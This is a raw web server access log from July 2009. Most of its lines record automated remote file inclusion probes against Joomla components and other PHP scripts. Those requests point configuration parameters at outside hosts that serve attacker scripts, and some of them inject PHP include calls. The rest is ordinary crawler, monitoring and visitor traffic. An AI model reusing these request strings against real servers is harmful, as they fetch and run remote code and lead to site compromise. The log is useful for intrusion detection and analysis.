87.20.186.139 - - [26/Jul/2009:08:00:52 -0400] "GET /logs/access_log.Q109062200%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
146.48.83.133 - - [26/Jul/2009:08:01:34 -0400] "GET /logs/access_log.Q109071100%20//common/db.php?commonpath=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
220.231.126.252 - - [26/Jul/2009:08:01:40 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:08:01:40 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:08:01:40 -0400] "GET /logs/access_log.Q109060800//index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:08:01:40 -0400] "GET /logs/access_log.Q109060900//index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:08:02:33 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
194.67.34.75 - - [26/Jul/2009:08:03:01 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.828"
194.67.34.75 - - [26/Jul/2009:08:03:01 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.828"
194.67.34.75 - - [26/Jul/2009:08:03:02 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.828"
65.23.158.226 - - [26/Jul/2009:08:03:17 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:08:03:17 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:08:03:17 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:08:03:54 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:08:04:08 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.125.45.45 - - [26/Jul/2009:08:04:49 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:04:49 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:04:49 -0400] "GET /logs/access_log.Q109052000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:04:49 -0400] "GET /logs/error_log.Q109051900/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.249.68.247 - - [26/Jul/2009:08:05:15 -0400] "GET /images/_notes/nav_store_fav_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:08:05:44 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:08:07:05 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.61.244.6 - - [26/Jul/2009:08:07:19 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://forumsupport.terra.co.id/Packages/test.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.61.244.6 - - [26/Jul/2009:08:07:20 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://forumsupport.terra.co.id/Packages/test.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET //index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET /logs//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET /logs/access_log.Q109052000//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET /logs//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET //index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:36 -0400] "GET /logs/access_log.Q109052000//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:08:07:46 -0400] "GET /logs//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:08:07:46 -0400] "GET //index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:08:07:46 -0400] "GET /logs/access_log.Q109052000//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:56 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:07:58 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:08:08:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.34.136.73 - - [26/Jul/2009:08:10:25 -0400] "GET /logs/access_log.Q109062900//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
212.34.136.73 - - [26/Jul/2009:08:10:25 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
212.34.136.73 - - [26/Jul/2009:08:10:25 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
125.241.54.8 - - [26/Jul/2009:08:10:28 -0400] "GET /logs/access_log.Q109052700//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:08:10:54 -0400] "GET /logs/access_log.Q109070200/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:08:10:54 -0400] "GET /?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:08:10:54 -0400] "GET /logs/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 200 11066 "-" "Mozilla/5.0"
212.34.136.73 - - [26/Jul/2009:08:11:12 -0400] "GET /logs/access_log.Q109071000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
211.43.202.66 - - [26/Jul/2009:08:11:20 -0400] "GET /logs/access_log.Q109052700//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.43.202.66 - - [26/Jul/2009:08:11:29 -0400] "GET /logs/access_log.Q109052700//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:08:11:47 -0400] "GET /images/_notes/download_get_it.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.110.19.24 - - [26/Jul/2009:08:12:03 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
194.67.34.75 - - [26/Jul/2009:08:12:33 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.828"
125.241.54.8 - - [26/Jul/2009:08:12:49 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.241.54.8 - - [26/Jul/2009:08:13:10 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?id=cats/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:08:13:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.19.4.138 - - [26/Jul/2009:08:13:33 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "http://webmail.aol.com/43792/aol/en-us/Suite.aspx" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
121.78.129.7 - - [26/Jul/2009:08:14:14 -0400] "GET /logs/error_log.Q109052300///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
121.78.129.7 - - [26/Jul/2009:08:14:15 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
121.78.129.7 - - [26/Jul/2009:08:14:16 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 200 11072 "-" "libwww-perl/5.79"
74.6.22.169 - - [26/Jul/2009:08:14:01 -0400] "GET /logs/access_log.Q109071300 HTTP/1.0" 200 4718643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.45.45 - - [26/Jul/2009:08:17:53 -0400] "GET /logs/access_log.Q109071200/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:17:53 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:17:53 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:18:02 -0400] "GET /logs/access_log.Q109060600/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:08:18:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:08:18:23 -0400] "GET /images/_notes/nav_store_search_off_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
146.48.83.133 - - [26/Jul/2009:08:18:45 -0400] "GET /logs/access_log.Q109070200/?addonDir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:08:18:45 -0400] "GET /?addonDir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
146.48.83.133 - - [26/Jul/2009:08:18:45 -0400] "GET /logs/?addonDir=http://www.amembersignup.com/signup/id.txt?%0D?? HTTP/1.1" 200 11066 "-" "libwww-perl/5.808"
202.125.45.45 - - [26/Jul/2009:08:18:53 -0400] "GET /logs/error_log.Q109070500/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:19:01 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:19:01 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:19:01 -0400] "GET /logs/access_log.Q109071000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.146.125.2 - - [26/Jul/2009:08:20:26 -0400] "GET /logs/error_log.Q109063000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.800"
62.146.125.2 - - [26/Jul/2009:08:20:26 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.800"
62.146.125.2 - - [26/Jul/2009:08:20:26 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.800"
62.146.125.2 - - [26/Jul/2009:08:21:19 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.mojzamosc.info/includes/Archive/sistem.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.800"
92.50.143.90 - - [26/Jul/2009:08:22:25 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:25 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:25 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:36 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:36 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:36 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:36 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:46 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:47 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:47 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:22:52 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.125.45.45 - - [26/Jul/2009:08:23:16 -0400] "GET /logs/error_log.Q109061000%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:08:23:16 -0400] "GET /logs/access_log.Q109071200%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:08:23:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.50.143.90 - - [26/Jul/2009:08:23:18 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:18 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:18 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:18 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:25 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:25 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.50.143.90 - - [26/Jul/2009:08:23:25 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:24:26 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:24:26 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:24:27 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:24:52 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:08:24:57 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:08:24:57 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c4.jpg.mno HTTP/1.1" 200 268 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.8 - - [26/Jul/2009:08:25:21 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:08:25:21 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:08:25:21 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:08:25:38 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:08:25:39 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:08:25:39 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.8 - - [26/Jul/2009:08:25:45 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.13 - - [26/Jul/2009:08:26:08 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:26:14 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:08:26:18 -0400] "GET /logs/access_log.Q109070800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:08:28:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [26/Jul/2009:08:28:31 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/idd.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
110.45.138.139 - - [26/Jul/2009:08:28:32 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/idd.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.68.37.163 - - [26/Jul/2009:08:29:26 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322)"
